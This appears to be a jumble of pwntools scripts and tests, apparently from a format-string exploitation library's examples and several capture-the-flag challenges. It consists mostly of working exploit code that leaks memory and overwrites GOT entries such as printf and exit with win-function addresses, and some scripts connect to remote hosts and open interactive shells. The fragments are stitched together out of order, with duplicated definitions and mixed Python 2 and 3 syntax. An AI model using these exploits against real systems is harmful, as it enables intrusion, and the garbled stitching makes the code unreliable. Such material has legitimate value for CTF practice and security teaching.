def test_win():
winner = 0x4008DA
connect()
fmtStr = FormatString(exec_fmt,
elf=elf,
index=6,
pad=0,
explore_stack=False)
fmtStr.write_q(elf.symbols['got.printf'], winner)
p.sendline("2")
p.sendline("")
out = p.recvline()
assert "This_is_the_flag" in out
def startIt():
global p
global fmtStr
p = process(os.path.join(SCRIPTDIR, fName), buffer_fill_size=0xffff)
p.recvuntil("Input: ")
fmtStr = FormatString(exec_fmt, elf=elf)
import IPython
import logging
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger()
fName = "./deardiary"
elf = ELF(fName)
# For deardiary
def exec_fmt(s):
global p
p = process(fName, buffer_fill_size=0xffff)
p.recvuntil("quit")
p.sendline("1")
p.sendline(s)
p.recvuntil("quit")
p.sendline("2")
p.recvuntil(">")
out = p.recvuntil("1.", drop=True)
p.recvuntil("quit")
p.close()
return out
fmtStr = FormatString(exec_fmt, elf=elf)
print(fmtStr.leak.s(elf.symbols['data']))
context.binary = elf
def connect():
global p
p = process(elf.file.name)
#p = remote("146.185.132.36",19153)
p.recvuntil("Exit the battle \n")
def exec_fmt(s):
print("Sending: " + repr(s))
p.sendline("2")
sleep(0.1)
p.sendline(s)
ret = p.recvuntil("1. Stack Bufferoverflow Bug", drop=True)
p.recvuntil("Exit the battle \n")
return ret
winner = 0x4008DA
connect()
fmtStr = FormatString(exec_fmt, elf=elf, index=6, pad=0, explore_stack=False)
fmtStr.write_q(elf.symbols['got.printf'], winner)
p.sendline("2")
p.interactive()
def test_it():
fmtStr = FormatString(exec_fmt, elf=elf)
assert fmtStr[elf.symbols['secret']] == 'This is my super secret string!'
assert fmtStr[elf.symbols['loggedIn']] == "\x00"
#!/usr/bin/env python
from formatStringExploiter.FormatString import FormatString
from pwn import *
def exec_fmt(s, echo=True):
# Open up pwntool process class to interact with application
p = process("./hacker_level", buffer_fill_size=0xffff)
# Go ahead and send our input
p.sendline(s)
# Throw out data that we know to be before our results
p.recvuntil("Hello, ", drop=True)
# We could do better here, but why? Just grab all the rest of the data.
out = p.recvall()
# For diagnostic reasons, we can print out the output
if echo:
print(out)
# Since we're running this every time, close out the proc.
p.close()
return out
elf = ELF("./hacker_level")
fmtStr = FormatString(exec_fmt, elf=elf)
fmtStr.write_d(elf.symbols['level'], 0xCCC31337)
# print elf
print(hex(elf.got['exit']))
get_secret = 0x08048713
print hex(get_secret)
def exec_fmt(s):
p = elf.process()
# p =remote('problem1.tjctf.org',8008)
p.recv()
password = '******'
p.sendline(password)
p.recv()
p.sendline(s)
p.recvuntil('> ', drop=True)
p.sendline(password)
out = p.recvuntil('\n\nTada!', drop=True)
print p.recvall()
return out
fmtStr = FormatString(exec_fmt,elf=elf, explore_stack=False)
# fmtStr.printStack()
fmtStr.write_d(elf.got['exit'], get_secret + 65537)
#!/usr/bin/env python
from formatStringExploiter.FormatString import FormatString
from pwn import *
import IPython
def exec_fmt(s):
global p
print("executing: " + repr(s))
# Open up pwntool process class to interact with application
p = process(["./fermat", s], buffer_fill_size=0xffff)
# Get the output
out = p.recvall()
return out
elf = ELF("./fermat")
fmtStr = FormatString(exec_fmt, elf=elf)
fmtStr.write_word(elf.symbols['secret'], 0x539)
IPython.embed()
def test_it():
fmtStr = FormatString(exec_fmt, elf=elf)
assert fmtStr.leak.s(
elf.symbols['secret']) == b'This is my super secret string!'
assert fmtStr.leak.b(elf.symbols['loggedIn']) == 0
from formatStringExploiter.FormatString import FormatString
elf = ELF('./secure')
print(hex(elf.got['exit']))
get_secret = 0x08048713
print hex(get_secret)
def exec_fmt(s):
p = elf.process()
print("executing: " + repr(s))
# p = remote('problem1.tjctf.org',8008)
p.recv()
password = '******'
p.sendline(password)
p.recv()
p.sendline(s)
p.recvuntil('> ', drop=True)
p.sendline(password)
out = p.recvuntil('\n\nTada!', drop=True)
print p.recvall()
return out
fmtStr = FormatString(exec_fmt, elf=elf, explore_stack=False)
print fmtStr.write_d(elf.got['exit'], get_secret + 0x10001)
#p=process('mary_morton')
p = remote("111.198.29.45", 44435)
elf = ELF('mary_morton')
libc = ELF('libc-2.23.so')
context.clear(arch='amd64')
taraddr = 0x4008da
print_addr = elf.got['printf']
print "printf_addr:" + hex(print_addr)
print p.recv()
def exec_fmt(s):
p.sendline('2')
sleep(0.1)
p.sendline(s)
ret = p.recvuntil('1. ', drop=True)
return ret
#print fmt('aaaa')
fmt = FormatString(exec_fmt, elf=elf, index=6)
fmt.write_qword(print_addr, taraddr)
print p.recv()
p.sendline('1')
p.interactive()
#print offset
def remote_atk(pl):
with remote('163.172.176.29', 9035) as p:
p.recvuntil('pwner, whats your name?\n')
p.sendline(pl)
p.recvuntil('Till then Bye')
p.interactive()
#fmtStr = FormatString(exec_fmt, elf=elf)
# index = 10
# pad = 0
# {'max_explore': 64, 'already_written': 1, 'index': 10, 'arch': 'i386', 'bad_chars': '\n', 'elf': ELF('/media/sd128/sdcard/ctf/backdoor/32_new'), 'leak': pwnlib.memleak.MemLeak(<bound method FormatString._leak of <formatStringExploiter.FormatString.FormatString instance at 0x7f9a4db16bd8>>, search_range=20, reraise=True), 'pad': 0, 'endian': 'little', 'padChar': 'C', 'bits': 32, 'stack': [0, 134514964, 4287639208, 1, 4148418072, 878, 4148127336, 4288161396, 4294223700, 4294281328, 1246382666, 607203621, 1246382704, 134220362, 4148590104, 725871085, 4147803752, 4148010770, 22683471, 4291817104, 4292129648, 878, 4151142496, 0, 4294967295, 4151212128, 4149479868, 4151994464, 0, 0, 6, 4151131424, 4152049433, 0, 4152130256, 4292899208, 4290620128, 4151290523, 134513148, 4293949144, 4151720564, 2, 4152046640, 1, 0, 1, 4152199448, 4151566800, 4151689224, 4151902848, 4151410696, 4294738648, 4151880780, 4151888258, 4151115784, 0, 4152123392, 4152051992, 4292519760, 134513630, 1663069007, 745303919, 1869574944, 1702305902], 'exec_fmt': <function exec_fmt at 0x7f9a50914230>}
# print vars(fmtStr)
# 0x84a8751
# 0x804870b
flag = elf.symbols['_Z4flagv']
#flag = 0x7be86c5
# 0x61a761a7
print hex(flag)
exit_got = elf.symbols['got.exit']
print hex(exit_got)
printf_plt = elf.symbols['got.printf']
print hex(printf_plt)
#payload = fmtstr_payload(10, {exit_got: flag})
# attack(payload)
payload = FormatString(attack, elf=elf, index=10, explore_stack=False)
payload.write_q(exit_got, flag)